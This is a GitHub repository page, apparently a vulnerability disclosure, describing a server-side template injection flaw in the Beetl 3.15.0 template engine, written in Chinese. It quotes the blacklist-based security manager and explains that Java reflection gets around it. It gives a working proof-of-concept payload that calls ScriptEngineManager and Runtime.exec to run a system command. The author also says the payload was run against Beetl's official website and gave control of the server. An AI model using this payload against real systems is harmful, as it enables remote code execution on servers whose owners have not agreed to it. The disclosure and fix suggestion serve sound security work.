Skip to content

luelueking/Beetl-3.15.0-vuln-poc

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
March 31, 2023 10:22

Beetl-3.15.0-vuln-poc

Beetl直到最新版本都存在SSTI(模版注入)漏洞

  • 对于安全管理器的策略采用的是黑名单的机制
public class DefaultNativeSecurityManager implements NativeSecurityManager{

        @Override
        public boolean permit(String resourceId, Class c, Object target, String method){
                if (c.isArray()){
                        //允许调用,但实际上会在在其后调用中报错。不归此处管理
                        return true;
                }
                String name = c.getSimpleName();
                String pkg = c.getPackage().getName();
                if (pkg.startsWith("java.lang")){
                        if (name.equals("Runtime") || name.equals("Process") || name.equals("ProcessBuilder")
                                        || name.equals("System")){
                                return false;
                        }
                }
                return true;
        }
}
  • 如果使用反射(java reflect)即可以绕过黑名单的一切策略

  • poc

${@Class.forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("s='open -a Calculator';java.lang.Runtime.getRuntime().exec(s);")}

ilOcbN.png

  • 拿官方的网站做例子 我输入了以下payload仅用于测试

ilbloa.png

  • 并成功拿到服务器的控制权限

ilbpyZ.png

修复建议

  • 限制反射(java reflect)

报告人

@luelueking

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published